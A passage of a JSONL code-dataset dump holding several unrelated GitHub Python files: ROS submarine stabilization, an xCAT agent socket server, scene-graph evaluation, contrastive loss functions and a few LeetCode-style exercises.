Work to Process\")\n\tsys.exit()\n\n#close connection to mysql\ncur.close()\ncon.close()\n\nmy_queue = queue.Queue()\ntime_of_last_run = time.time()\n\nclass queue_runner(threading.Thread):\n\tdef __init__(self, my_queue):\n\t\tthreading.Thread.__init__(self)\n\t\tself.my_queue = my_queue\n\n\tdef run(self):\n\t\tglobal time_of_last_run\n\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\tmy_id = self.my_queue.get(True, 1)\n\t\t\texcept:\n\t\t\t\tif time.time() - time_of_last_run > 3:\n\t\t\t\t\treturn\n\t\t\telse:\n\t\t\t\tif my_id:\n\t\t\t\t\ttime_of_last_run = time.time()\n\t\t\t\t\tsubprocess.call([\"php\", pathname+\"/../nix_scripts/tmux/bin/requestID.php\", \"\"+my_id])\n\t\t\t\t\ttime.sleep(.05)\n\t\t\t\t\tself.my_queue.task_done()\n\ndef main():\n\tglobal time_of_last_run\n\ttime_of_last_run = time.time()\n\n\tdef signal_handler(signal, frame):\n\t\tsys.exit(0)\n\n\tsignal.signal(signal.SIGINT, signal_handler)\n\n\tif True:\n\t\tprint(\"We will be using a max of %s threads, a queue of %s items\" % (threads, \"{:,}\".format(len(datas))))\n\t\ttime.sleep(2)\n\n\t\t#spawn a pool of place worker threads\n\t\tfor i in range(threads):\n\t\t\tp = queue_runner(my_queue)\n\t\t\tp.setDaemon(False)\n\t\t\tp.start()\n\n\t#now load some arbitrary jobs into the queue\n\tfor release in datas:\n\t\tmy_queue.put(\"%s %s %s\" % (release[0], release[1], release[2]))\n\n\tmy_queue.join()\n\n\tprint(\"\\n\")\nif __name__ == '__main__':\n\tmain()\n","repo_name":"KurzonDax/nZEDbetter","sub_path":"misc/update_scripts/threaded_scripts/requestid_threaded.py","file_name":"requestid_threaded.py","file_ext":"py","file_size_in_byte":2502,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"20051853184","text":"'''Given the array favoriteCompanies where favoriteCompanies[i] is the list of favorites companies for the ith person (indexed from 0).\n\nReturn the indices of people whose list of favorite companies is not a subset of any other list of favorites companies. You must return the indices in increasing order.\n\n \n\nExample 1:\n\nInput: favoriteCompanies = [[\"leetcode\",\"google\",\"facebook\"],[\"google\",\"microsoft\"],[\"google\",\"facebook\"],[\"google\"],[\"amazon\"]]\nOutput: [0,1,4] \nExplanation: \nPerson with index=2 has favoriteCompanies[2]=[\"google\",\"facebook\"] which is a subset of favoriteCompanies[0]=[\"leetcode\",\"google\",\"facebook\"] corresponding to the person with index 0. \nPerson with index=3 has favoriteCompanies[3]=[\"google\"] which is a subset of favoriteCompanies[0]=[\"leetcode\",\"google\",\"facebook\"] and favoriteCompanies[1]=[\"google\",\"microsoft\"]. \nOther lists of favorite companies are not a subset of another list, therefore, the answer is [0,1,4].\nExample 2:\n\nInput: favoriteCompanies = [[\"leetcode\",\"google\",\"facebook\"],[\"leetcode\",\"amazon\"],[\"facebook\",\"google\"]]\nOutput: [0,1] \nExplanation: In this case favoriteCompanies[2]=[\"facebook\",\"google\"] is a subset of favoriteCompanies[0]=[\"leetcode\",\"google\",\"facebook\"], therefore, the answer is [0,1].\nExample 3:\n\nInput: favoriteCompanies = [[\"leetcode\"],[\"google\"],[\"facebook\"],[\"amazon\"]]\nOutput: [0,1,2,3]'''\n\nfrom ast import List\nimport collections\n\n# tc: O(n^2) and sc: O(n)\nclass Solution:\n def peopleIndexes(self, fav: List[List[str]]) -> List[int]:\n res = []\n new_fav = sorted(fav , key = lambda x : len(x)) \n '''A is subset of B then len(A) < len(B)\n // New List to iterate on lists >= len(fav[i]) to save some iterations'''\n for i in range(len(new_fav)) :\n flag = True \n '''Intalize it as unique list'''\n for j in range(i+1 , len(new_fav)) :\n '''EX--if len of A is 2 and (A intersection B is) 1\n then A not subsect of B , the intersection must be equal len(A)'''\n if len(set(new_fav[j]).intersection(set(new_fav[i]))) == len(new_fav[i]) :\n flag = False \n break \n\n if flag : \n ''' add to result if it is Unique list'''\n res.append(fav.index(new_fav[i])) \n res.sort() \n return res\n\n\nclass Solution:\n def peopleIndexes(self, favoriteCompanies: List[List[str]]) -> List[int]:\n\n c = collections.defaultdict(set)\n f = favoriteCompanies\n for i in range(len(f)):\n c[i] = set(f[i])\n \n\n ans = []\n for i in range(len(f)):\n for key in c:\n if key == i :\n continue\n if c[i] & c[key] == c[i]:\n break \n else:\n ans.append(i)\n return ans\n\n","repo_name":"DEVHrishi/DSA--PYTHON--SQL","sub_path":"Hashing/Medium/People Whose List of Favorite Companies Is Not a Subset of Another List.py","file_name":"People Whose List of Favorite Companies Is Not a Subset of Another List.py","file_ext":"py","file_size_in_byte":2861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21133265398","text":"import copy\r\nimport os\r\n\r\nimport numpy as np\r\n\r\nfrom .oi_evaluation import eval_rel_results, eval_entites_detection, eval_classic_recall\r\nfrom ..vg.vg_eval import save_output\r\n\r\n\r\ndef oi_evaluation(\r\n cfg,\r\n dataset,\r\n predictions,\r\n output_folder,\r\n logger,\r\n iou_types,\r\n **_\r\n):\r\n if cfg.MODEL.ROI_RELATION_HEAD.USE_GT_BOX:\r\n if cfg.MODEL.ROI_RELATION_HEAD.USE_GT_OBJECT_LABEL:\r\n mode = 'predcls'\r\n else:\r\n mode = 'sgcls'\r\n else:\r\n mode = 'sgdet'\r\n\r\n result_str = '\\n' + '=' * 100 + '\\n'\r\n\r\n result_dict_list_to_log = []\r\n\r\n predicate_cls_list = dataset.ind_to_predicates\r\n\r\n groundtruths = []\r\n # resize predition to same scale with the images\r\n for image_id, prediction in enumerate(predictions):\r\n img_info = dataset.get_img_info(image_id)\r\n image_width = img_info[\"width\"]\r\n image_height = img_info[\"height\"]\r\n # recover original size which is before transform\r\n predictions[image_id] = prediction.resize((image_width, image_height))\r\n gt = dataset.get_groundtruth(image_id, evaluation=True)\r\n groundtruths.append(gt)\r\n\r\n save_output(output_folder, groundtruths, predictions, dataset)\r\n\r\n # eval detection by coco style eval\r\n if \"bbox\" in iou_types:\r\n result_str_tmp = ''\r\n (mAp,\r\n result_dict_list_to_log,\r\n result_str_tmp) = eval_entites_detection(mode, groundtruths, dataset, predictions,\r\n result_dict_list_to_log, result_str_tmp, logger)\r\n result_str += result_str_tmp\r\n logger.info(result_str_tmp)\r\n\r\n if not cfg.MODEL.RELATION_ON:\r\n return mAp, result_dict_list_to_log\r\n\r\n result_str_tmp = ''\r\n result_str_tmp, \\\r\n result_dict_list_to_log = eval_classic_recall(mode, groundtruths, predictions, predicate_cls_list,\r\n logger, result_str_tmp, result_dict_list_to_log)\r\n result_str += result_str_tmp\r\n logger.info(result_str_tmp)\r\n\r\n\r\n # transform the initial prediction into oi predition format\r\n packed_results = adapt_results(groundtruths, predictions)\r\n\r\n result_str_tmp = ''\r\n result_str_tmp, \\\r\n result_dict = eval_rel_results(\r\n packed_results, predicate_cls_list, result_str_tmp, logger,\r\n )\r\n result_dict_list_to_log.append(result_dict)\r\n\r\n result_str += result_str_tmp\r\n logger.info(result_str_tmp)\r\n\r\n\r\n if output_folder:\r\n with open(os.path.join(output_folder, \"evaluation_res.txt\"), 'w') as f:\r\n f.write(result_str)\r\n\r\n return float(result_dict['w_final_score']), result_dict_list_to_log\r\n\r\n\r\ndef adapt_results(\r\n groudtruths, predictions,\r\n):\r\n packed_results = []\r\n for gt, pred in zip(groudtruths, predictions):\r\n gt = copy.deepcopy(gt)\r\n pred = copy.deepcopy(pred)\r\n\r\n pred_boxlist = pred.convert('xyxy').to(\"cpu\")\r\n pred_ent_scores = pred_boxlist.get_field('pred_scores').detach().cpu()\r\n pred_ent_labels = pred_boxlist.get_field('pred_labels').long().detach().cpu()\r\n pred_ent_labels = pred_ent_labels - 1 # remove the background class\r\n\r\n pred_rel_pairs = pred_boxlist.get_field('rel_pair_idxs').long().detach().cpu() # N * R * 2\r\n pred_rel_scores = pred_boxlist.get_field('pred_rel_scores').detach().cpu() # N * C\r\n\r\n sbj_boxes = pred_boxlist.bbox[pred_rel_pairs[:, 0], :].numpy()\r\n sbj_labels = pred_ent_labels[pred_rel_pairs[:, 0]].numpy()\r\n sbj_scores = pred_ent_scores[pred_rel_pairs[:, 0]].numpy()\r\n\r\n obj_boxes = pred_boxlist.bbox[pred_rel_pairs[:, 1], :].numpy()\r\n obj_labels = pred_ent_labels[pred_rel_pairs[:, 1]].numpy()\r\n obj_scores = pred_ent_scores[pred_rel_pairs[:, 1]].numpy()\r\n\r\n prd_scores = pred_rel_scores\r\n\r\n gt_boxlist = gt.convert('xyxy').to(\"cpu\")\r\n gt_ent_labels = gt_boxlist.get_field('labels')\r\n gt_ent_labels = gt_ent_labels - 1\r\n\r\n gt_rel_tuple = gt_boxlist.get_field('relation_tuple').long().detach().cpu()\r\n sbj_gt_boxes = gt_boxlist.bbox[gt_rel_tuple[:, 0], :].detach().cpu().numpy()\r\n obj_gt_boxes = gt_boxlist.bbox[gt_rel_tuple[:, 1], :].detach().cpu().numpy()\r\n sbj_gt_classes = gt_ent_labels[gt_rel_tuple[:, 0]].long().detach().cpu().numpy()\r\n obj_gt_classes = gt_ent_labels[gt_rel_tuple[:, 1]].long().detach().cpu().numpy()\r\n prd_gt_classes = gt_rel_tuple[:, -1].long().detach().cpu().numpy()\r\n prd_gt_classes = prd_gt_classes - 1\r\n\r\n return_dict = dict(sbj_boxes=sbj_boxes,\r\n sbj_labels=sbj_labels.astype(np.int32, copy=False),\r\n sbj_scores=sbj_scores,\r\n obj_boxes=obj_boxes,\r\n obj_labels=obj_labels.astype(np.int32, copy=False),\r\n obj_scores=obj_scores,\r\n prd_scores=prd_scores,\r\n # prd_scores_bias=prd_scores,\r\n # prd_scores_spt=prd_scores,\r\n # prd_ttl_scores=prd_scores,\r\n gt_sbj_boxes=sbj_gt_boxes,\r\n gt_obj_boxes=obj_gt_boxes,\r\n gt_sbj_labels=sbj_gt_classes.astype(np.int32, copy=False),\r\n gt_obj_labels=obj_gt_classes.astype(np.int32, copy=False),\r\n gt_prd_labels=prd_gt_classes.astype(np.int32, copy=False))\r\n\r\n packed_results.append(return_dict)\r\n\r\n return packed_results\r\n","repo_name":"SHTUPLUS/PySGG","sub_path":"pysgg/data/datasets/evaluation/oi/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5625,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"53"} +{"seq_id":"74953582247","text":"\nimport sys\nimport os \nimport glob\nimport zipfile\n\ndef main():\n \"\"\"\n 3단계에서 슬라이싱 되고 생성된 수많은 이미지 데이터-라벨 파일들을 하나로 압축\n \"\"\"\n\n condition = \"./data/*.png\"\n\n png_files = glob.glob(condition)\n print(png_files)\n\n with zipfile.ZipFile(\"car_image_angle.zip\", 'w') as my_zip:\n for file in png_files:\n my_zip.write(file)\n my_zip.close()\n\nif __name__ =='__main__':\n\tmain()\n\n\n","repo_name":"ssuzzang/ssingssingcar","sub_path":"hj_label_data_compress.py","file_name":"hj_label_data_compress.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"1019882541","text":"#! /usr/bin/env python2\nfrom enum import Enum\nimport math, time\n\nfrom nav_msgs.msg import Odometry\nfrom sub_trajectory.msg import StabilityMode\nfrom geometry_msgs.msg import Wrench, WrenchStamped\nfrom std_msgs.msg import Float64\nfrom dynamic_reconfigure.server import Server\nfrom sub_trajectory.cfg import StabilityConfig\n\nimport tf\nimport rospy\nimport numpy as np\n\ndef rosToArray(msg): #Convert a ros message with 1-4 dimensions into a numpy array\n return np.array([getattr(msg, key) for key in (\"x\", \"y\", \"z\", \"w\") if hasattr(msg, key)])\n\ndef rotateVector(quat, vec):\n\tquat2 = list(vec)\n\tquat2.append(0.0)\n\treturn tf.transformations.quaternion_multiply(\n\t\ttf.transformations.quaternion_multiply(quat, quat2),\n\t\ttf.transformations.quaternion_conjugate(quat)\n\t)[:3]\n\nclass ActiveStabilizer():\n\tdef __init__(self):\n\t\tself.curDepthMode = StabilityMode.off\n\t\tself.curAngleMode = StabilityMode.off\n\t\tself.yawEnabled = False\n\n\t\tself.saveDepth = True\n\t\tself.saveOrientation = True\n\n\t\tself.targetDepth = None\n\t\tself.targetOrientation = None\n\n\t\tself.lastUpdateTime = None\n\n\t\tself.depthVelGain = 1\n\t\tself.depthPosGain = [1, 0, 1]\n\t\tself.depthLastPos = None\n\t\tself.depthIntegratedError = 0\n\t\tself.depthMaxForce = 5\n\n\t\tself.orientVelGain = 1\n\t\tself.orientPosGain = [2, 0, 1]\n\t\tself.orientLastError = None\n\t\tself.orientIntegratedError = np.array([0.0,0.0,0.0],dtype=\"float64\")\n\t\tself.orientMaxForce = 2\n\n\t\tself.reconfigureServer = Server(StabilityConfig, self.reconfigureCallback)\n\n\t\tself.angleModeSubscriber = rospy.Subscriber(\"/thrusters/angleMode\", StabilityMode, self.angleModeCallback, queue_size=1)\n\t\tself.depthModeSubscriber = rospy.Subscriber(\"/thrusters/depthMode\", StabilityMode, self.depthModeCallback, queue_size=1)\n\t\tself.odomSubcriber = rospy.Subscriber(\"/odometry/filtered\",Odometry, self.callback, queue_size=1)\n\n\t\tself.stabilityPublisher = rospy.Publisher(\"/stabilityWrench\", WrenchStamped, queue_size=1)\n\n\t\tself.stabilityWrench = WrenchStamped()\n\t\tself.stabilityWrench.header.frame_id = 'base_link'\n\n\t\tself.setPointPub = rospy.Publisher(\"/setpoint\", Float64, queue_size=10)\n\n\tdef reconfigureCallback(self, config, level):\n\t\tself.depthVelGain = config[\"depth_vel_P\"]\n\t\tself.depthPosGain = [config[\"depth_pos_P\"],\n\t\t\t\t\t\t\tconfig[\"depth_pos_I\"],\n\t\t\t\t\t\t\tconfig[\"depth_pos_D\"]]\n\t\tself.depthMaxForce = config[\"depth_pos_Max\"]\n\t\t\n\t\tself.orientVelGain = config[\"orientation_vel_P\"]\n\t\tself.orientPosGain = [config[\"orientation_pos_P\"],\n\t\t\t\t\t\t\tconfig[\"orientation_pos_I\"],\n\t\t\t\t\t\t\tconfig[\"orientation_pos_D\"]]\n\t\tself.orientMaxForce = config[\"orientation_pos_Max\"]\n\n\t\treturn config\n\n\tdef depthModeCallback(self, msg):\n\t\tself.curDepthMode = msg.mode\n\n\t\tif self.curDepthMode == msg.position:\n\t\t\tself.depthLastPos = None\n\n\t\tif np.isfinite(msg.target.z):\n\t\t\tself.saveDepth = False\n\t\t\tself.targetDepth = msg.target.z\n\t\telif self.curDepthMode != StabilityMode.position:\n\t\t\tself.saveDepth = True\n\n\tdef angleModeCallback(self, msg):\n\t\tself.yawEnabled = msg.yawEnabled\n\t\tself.curAngleMode = msg.mode\n\n\t\tif self.curAngleMode == msg.position:\n\t\t\tself.orientLastError = None\n\t\tif np.isfinite(msg.target.w):\n\t\t\tself.saveOrientation = False\n\t\t\tself.targetOrientation = rosToArray(msg.target)\n\t\tif self.curAngleMode != StabilityMode.position:\n\t\t\tself.saveOrientation = True\n\n\tdef callback(self, msg):\n\t\ttimeNow = rospy.get_time()\n\t\t\n\t\t#TODO: How to reset the error integrations?\n\t\tif self.depthLastPos is None or self.curDepthMode is not StabilityMode.position:\n\t\t\tself.depthLastPos = msg.pose.pose.position.z\n\t\t\n\t\tif self.orientLastError is None or self.curAngleMode is not StabilityMode.position:\n\t\t\tself.orientLastError = np.array([0,0,0])\n\t\t\tself.orientIntegratedError = np.array([0.0,0.0,0.0],dtype=\"float64\")\n\n\t\tif self.curDepthMode == StabilityMode.off:\n\t\t\tself.stabilityWrench.wrench.force.x = 0\n\t\t\tself.stabilityWrench.wrench.force.y = 0\n\t\t\tself.stabilityWrench.wrench.force.z = 0\n\t\t\n\t\telif self.curDepthMode == StabilityMode.velocity:\n\t\t\tquat = rosToArray(msg.pose.pose.orientation)\n\t\t\tcounterVec = rotateVector(quat, [0,0,-self.depthVelGain*msg.twist.twist.linear.z])\n\t\t\tself.stabilityWrench.wrench.force.x = counterVec[0]\n\t\t\tself.stabilityWrench.wrench.force.y = counterVec[1]\n\t\t\tself.stabilityWrench.wrench.force.z = counterVec[2]\n\n\t\telif self.curDepthMode == StabilityMode.position:\n\t\t\tif self.saveDepth:\n\t\t\t\tself.targetDepth = msg.pose.pose.position.z\n\t\t\t\tself.saveDepth = False\n\t\t\tself.setPointPub.publish(Float64(self.targetDepth))\n\t\t\terror = msg.pose.pose.position.z - self.targetDepth\n\t\t\t\n\t\t\tproportionalCorrection = -self.depthPosGain[0]*error\n\t\t\tintegralCorrection = 0\n\t\t\tderivativeCorrection = 0\n\t\t\t\n\t\t\t#TODO: Should we actually use the update time for this stuff?\n\t\t\tif self.lastUpdateTime is not None:\n\t\t\t\t#Depth derivative computation\n\t\t\t\tderivativeCorrection = -self.depthPosGain[2] * (msg.pose.pose.position.z - self.depthLastPos) / (timeNow - self.lastUpdateTime)\n\t\t\t\tself.depthLastPos = msg.pose.pose.position.z\n\n\t\t\t\tif self.depthPosGain[1] > 0.0001:\n\t\t\t\t\tself.depthIntegratedError += error * (timeNow - self.lastUpdateTime)\n\t\t\t\tintegralCorrection = -self.depthPosGain[1] * self.depthIntegratedError\n\t\t\t\t#Back-calculation integrator windup prevention\n\t\t\t\tif abs(proportionalCorrection + derivativeCorrection + integralCorrection) > self.depthMaxForce and self.depthPosGain[1] > 0.0001:\n\t\t\t\t\tself.depthIntegratedError = ((-np.sign(error)*self.depthMaxForce) - derivativeCorrection - proportionalCorrection)/-self.depthPosGain[1]\n\t\t\t\tintegralCorrection = -self.depthPosGain[1] * self.depthIntegratedError\n\n\t\t\t#print([ proportionalCorrection, derivativeCorrection, integralCorrection])\t\n\n\t\t\tquat = rosToArray(msg.pose.pose.orientation)\n\t\t\tquat = tf.transformations.quaternion_conjugate(quat)\n\t\t\tcounterVec = rotateVector(quat, [0,0,proportionalCorrection + derivativeCorrection + integralCorrection])\n\t\t\tself.stabilityWrench.wrench.force.x = counterVec[0]\n\t\t\tself.stabilityWrench.wrench.force.y = counterVec[1]\n\t\t\tself.stabilityWrench.wrench.force.z = counterVec[2]\n\n\t\telse:\n\t\t\tself.stabilityWrench.wrench.force.x = 0\n\t\t\tself.stabilityWrench.wrench.force.y = 0\n\t\t\tself.stabilityWrench.wrench.force.z = 0\n\n\t\tif self.curAngleMode == StabilityMode.off:\n\t\t\tself.stabilityWrench.wrench.torque.x = 0\n\t\t\tself.stabilityWrench.wrench.torque.y = 0\n\t\t\tself.stabilityWrench.wrench.torque.z = 0\n\t\t\n\t\telif self.curAngleMode == StabilityMode.velocity:\n\t\t\tself.stabilityWrench.wrench.torque.x = -self.orientVelGain * msg.twist.twist.angular.x\n\t\t\tself.stabilityWrench.wrench.torque.y = -self.orientVelGain * msg.twist.twist.angular.y\n\n\t\t\tif self.yawEnabled:\n\t\t\t\tself.stabilityWrench.wrench.torque.z = -self.orientVelGain * msg.twist.twist.angular.z\n\t\t\telse:\n\t\t\t\tself.stabilityWrench.wrench.torque.z = 0.0\n\n\t\telif self.curAngleMode == StabilityMode.position:\n\t\t\tif self.saveOrientation:\n\t\t\t\tself.targetOrientation = rosToArray(msg.pose.pose.orientation)\n\t\t\t\tself.saveOrientation = False\n\n\t\t\terror = tf.transformations.quaternion_multiply(\n\t\t\t\tself.targetOrientation,\n\t\t\t\ttf.transformations.quaternion_conjugate(rosToArray(msg.pose.pose.orientation))\n\t\t\t) #Find rotation from current to target position\n\n\t\t\t#TODO: Do we need to transform the error and how\n\t\t\terror = rotateVector(tf.transformations.quaternion_conjugate(rosToArray(msg.pose.pose.orientation)),\n\t\t\t\t\t\t\t\t [error[0], error[1],error[2]])\n\n\t\t\t#rpyError = np.array(tf.transformations.euler_from_quaternion(subLocalError))\n\t\t\trpyError = np.array([error[0], error[1],error[2]])\n\n\t\t\tproportionalCorrection = self.orientPosGain[0]*rpyError\n\t\t\tintegralCorrection = np.array([0,0,0])\n\t\t\tderivativeCorrection = np.array([0,0,0])\n\t\t\t\n\t\t\t#TODO: Should we actually use the update time for this stuff?\n\t\t\tif self.lastUpdateTime is not None:\n\t\t\t\t#Depth derivative computation\n\t\t\t\tderivativeCorrection = self.orientPosGain[2] * (rpyError - self.orientLastError) / (timeNow - self.lastUpdateTime)\n\t\t\t\tself.orientLastError = rpyError\n\t\t\t\tif self.orientPosGain[1] > 0.0001:\n\t\t\t\t\tself.orientIntegratedError += rpyError * (timeNow - self.lastUpdateTime)\n\t\t\t\tintegralCorrection = self.orientPosGain[1] * self.orientIntegratedError\n\t\t\t\t#Back-calculation integrator windup prevention\n\t\t\t\tif self.orientPosGain[1] > 0.0001:\n\t\t\t\t\tfor i in range(3):\n\t\t\t\t\t\tif abs(proportionalCorrection[i] + derivativeCorrection[i] + integralCorrection[i]) > self.orientMaxForce:\n\t\t\t\t\t\t\tself.orientIntegratedError[i] = ((np.sign(rpyError[i])*self.orientMaxForce) - derivativeCorrection[i] - proportionalCorrection[i])/self.orientPosGain[1]\n\t\t\t\t\n\t\t\t\tintegralCorrection = self.orientPosGain[1] * self.orientIntegratedError\n\n\t\t\tself.stabilityWrench.wrench.torque.x = proportionalCorrection[0] + derivativeCorrection[0] + integralCorrection[0]\n\t\t\tself.stabilityWrench.wrench.torque.y = proportionalCorrection[1] + derivativeCorrection[1] + integralCorrection[1]\n\t\t\tif self.yawEnabled:\n\t\t\t\tself.stabilityWrench.wrench.torque.z = proportionalCorrection[2] + derivativeCorrection[2] + integralCorrection[2]\n\t\t\telse:\n\t\t\t\tself.stabilityWrench.wrench.torque.z = 0.0\n\n\t\telse:\n\t\t\tself.stabilityWrench.wrench.torque.x = 0\n\t\t\tself.stabilityWrench.wrench.torque.y = 0\n\t\t\tself.stabilityWrench.wrench.torque.z = 0\n\n\t\tself.stabilityWrench.header.stamp = rospy.Time.now()\n\t\tself.stabilityPublisher.publish(self.stabilityWrench)\n\t\tself.lastUpdateTime = timeNow\n\nif __name__== \"__main__\":\n\trospy.init_node('ActiveStability', anonymous=False)\n\tactStab = ActiveStabilizer()\n\trospy.spin()\n","repo_name":"RoboticsClubatUCF/RoboSub","sub_path":"ucf_sub_catkin_ros/src/sub_trajectory/src/active_stability.py","file_name":"active_stability.py","file_ext":"py","file_size_in_byte":9372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18624372406","text":"# -*- encoding: utf-8 -*-\nfrom __future__ import print_function\nimport json\nimport sys\nimport os\nimport threading\nimport fcntl\nimport traceback\nfrom gevent import socket\nfrom gevent.server import StreamServer\nfrom gevent.lock import BoundedSemaphore\nfrom common import utils\nfrom xcatagent import base as xcat_manager\n\nMSG_TYPE = 'message'\nDB_TYPE = 'db'\n#LOCK_FILE = '/var/lock/xcat/agent.lock'\n\n\nclass XCATMessager(utils.Messager):\n def __init__(self, sock):\n self.sock = sock\n self.sem = BoundedSemaphore(1)\n\n def _send(self, d):\n buf = json.dumps(d)\n self.sem.acquire()\n self.sock.sendall(utils.int2bytes(len(buf)) + buf.encode('utf-8'))\n self.sem.release()\n\n def info(self, msg):\n d = {'type': MSG_TYPE, 'msg': {'type': 'info', 'data': msg}}\n self._send(d)\n\n def warn(self, msg):\n d = {'type': MSG_TYPE, 'msg': {'type': 'warning', 'data': msg}}\n self._send(d)\n\n def error(self, msg, node=''):\n d = {'type': MSG_TYPE, 'msg': {'type': 'error', 'node': node, 'data': msg}}\n self._send(d)\n\n def syslog(self, msg):\n d = {'type': MSG_TYPE, 'msg': {'type': 'syslog', 'data': msg}}\n self._send(d)\n\n def info_with_host(self, msg):\n d = {'type': MSG_TYPE, 'msg': {'type': 'info_with_host', 'data': msg}}\n self._send(d)\n\n def update_node_attributes(self, attribute, node, data):\n d = {'type': DB_TYPE, 'attribute': {'name': attribute, 'method': 'set', 'type': 'node', 'node': node, 'value': data}}\n self._send(d)\n\n\nclass Server(object):\n def __init__(self, address, standalone=True, lockfile=None):\n try:\n os.unlink(address)\n except OSError:\n if os.path.exists(address):\n raise\n self.address = address\n self.standalone = standalone\n self.lockfile = lockfile\n self.server = StreamServer(self._serve(), self._handle)\n\n def _serve(self):\n listener = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)\n listener.bind(self.address)\n listener.listen(1)\n return listener\n\n def _handle(self, sock, address):\n try:\n messager = XCATMessager(sock)\n buf = sock.recv(4)\n sz = utils.bytes2int(buf)\n buf = utils.recv_all(sock, sz)\n req = json.loads(buf)\n if not 'command' in req:\n messager.error(\"Could not find command\")\n return\n if not 'module' in req:\n messager.error(\"Please specify the request module\")\n return\n if not 'cwd' in req:\n messager.error(\"Please specify the cwd parameter\")\n return\n manager_func = xcat_manager.BaseManager.get_manager_func(\n req['module'])\n if manager_func is None:\n messager.error(\"Could not find manager for %s\" % req['module'])\n return\n nodes = req.get(\"nodes\", None)\n manager = manager_func(messager, req['cwd'], nodes, req['envs'])\n if not hasattr(manager, req['command']):\n messager.error(\"command %s is not supported\" % req['command'])\n func = getattr(manager, req['command'])\n # translate unicode string to normal string to avoid docopt error\n new_args=[]\n if req['args']:\n for a in req['args']:\n new_args.append(str(a))\n # call the function in the specified manager\n func(req['nodeinfo'], new_args)\n # after the method returns, the request should be handled\n # completely, close the socket for client\n if not self.standalone:\n sock.close()\n self.server.stop()\n os._exit(0)\n except ImportError:\n messager.error(\"OpenBMC management is using a Python framework and some dependency libraries could not be imported.\")\n print(traceback.format_exc(), file=sys.stderr)\n self.server.stop()\n os._exit(1)\n except Exception:\n print(traceback.format_exc(), file=sys.stderr)\n self.server.stop()\n os._exit(1)\n\n def keep_peer_alive(self):\n def acquire():\n fd = open(self.lockfile, \"r+\")\n fcntl.flock(fd.fileno(), fcntl.LOCK_EX)\n # if reach here, parent process may exit\n print(\"xcat process exit unexpectedly.\", file=sys.stderr)\n self.server.stop()\n os._exit(1)\n\n t = threading.Thread(target=acquire)\n t.start()\n\n def start(self):\n if not self.standalone:\n self.keep_peer_alive()\n self.server.serve_forever()\n","repo_name":"xcat2/xcat-core","sub_path":"xCAT-openbmc-py/lib/python/agent/xcatagent/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":4768,"program_lang":"python","lang":"en","doc_type":"code","stars":339,"dataset":"github-code","pt":"53"} +{"seq_id":"23232404274","text":"N = int(input())\nsum_left = 0\nsum_right = 0\ncurrent_number = 0\n\nfor i in range (0, N):\n current_number = int(input())\n sum_left += current_number\nfor i in range(0, N):\n current_number = int(input())\n sum_right += current_number\n\nif sum_left == sum_right:\n print(F\"Yes, sum = {sum_left} \")\nelse:\n print(F\"No, diff = {abs(sum_left - sum_right)}\")","repo_name":"Nedelchev86/Python-Basic-SoftUni","sub_path":"For Loop - Lab/09_Left_and_Right_Sum2.py","file_name":"09_Left_and_Right_Sum2.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1431743059","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom utils.tensor_operator import to_device, tensor2array, force_fp32\nfrom . import atom_loss_register\nfrom ..utils import symmetric_loss_wrapper\n\n\n@atom_loss_register\n@symmetric_loss_wrapper\n@force_fp32()\ndef cdist_loss(X, Y, margin):\n dist = torch.cdist(X, Y, p=2)\n pos = torch.diag(dist)\n\n bs = X.size(0)\n mask = torch.eye(bs, device=X.device)\n neg = (1 - mask) * dist + mask * margin\n neg = torch.relu(margin - neg)\n loss = torch.mean(pos) + torch.sum(neg) / bs / (bs - 1)\n return loss\n\n\n@atom_loss_register\n@symmetric_loss_wrapper\ndef dualModalityInfoNCE_loss(X, Y, temperature, normalize=False):\n if normalize:\n X = F.normalize(X, dim=-1)\n Y = F.normalize(Y, dim=-1)\n\n criterion = nn.CrossEntropyLoss()\n B = X.size()[0]\n logits = torch.mm(X, Y.transpose(1, 0)) # B*B\n logits = torch.div(logits, temperature)\n labels = torch.arange(B).long().to(logits.device) # B*1\n\n CL_loss = criterion(logits, labels)\n\n return CL_loss\n\n\n@atom_loss_register\ndef infoNCE_loss(features, temperature):\n bn, dim = features.size()\n batch_size = bn / 2\n n_views = 2\n labels = torch.cat([torch.arange(batch_size) for i in range(n_views)], dim=0)\n labels = (labels.unsqueeze(0) == labels.unsqueeze(1)).float()\n labels = to_device(labels, features.device)\n\n features = F.normalize(features, dim=1)\n\n similarity_matrix = torch.matmul(features, features.t())\n # assert similarity_matrix.shape == (\n # n_views * batch_size, n_views * batch_size)\n # assert similarity_matrix.shape == labels.shape\n\n # discard the main diagonal from both: labels and similarities matrix\n mask = torch.eye(labels.shape[0], dtype=torch.bool)\n labels = labels[~mask].view(labels.shape[0], -1)\n similarity_matrix = similarity_matrix[~mask].view(similarity_matrix.shape[0], -1)\n # assert similarity_matrix.shape == labels.shape\n\n # select and combine multiple positives\n positives = similarity_matrix[labels.bool()].view(labels.shape[0], -1)\n\n # select only the negatives the negatives\n negatives = similarity_matrix[~labels.bool()].view(similarity_matrix.shape[0], -1)\n\n logits = torch.cat([positives, negatives], dim=1)\n labels = torch.zeros(logits.shape[0], dtype=torch.long, device=features.device)\n\n logits = logits / temperature\n\n logits = F.cross_entropy(logits, labels)\n return logits\n","repo_name":"prokia/MIGA","sub_path":"core/loss/base/atom_loss.py","file_name":"atom_loss.py","file_ext":"py","file_size_in_byte":2458,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"1032587479","text":"def longestSubstringWithoutRepeatingChar(arr):\n i,j=0,0\n map={}\n maxLen=-1\n while j<len(arr):\n if arr[j] not in map:\n map[arr[j]]=1\n else:\n map[arr[j]]+=1\n if 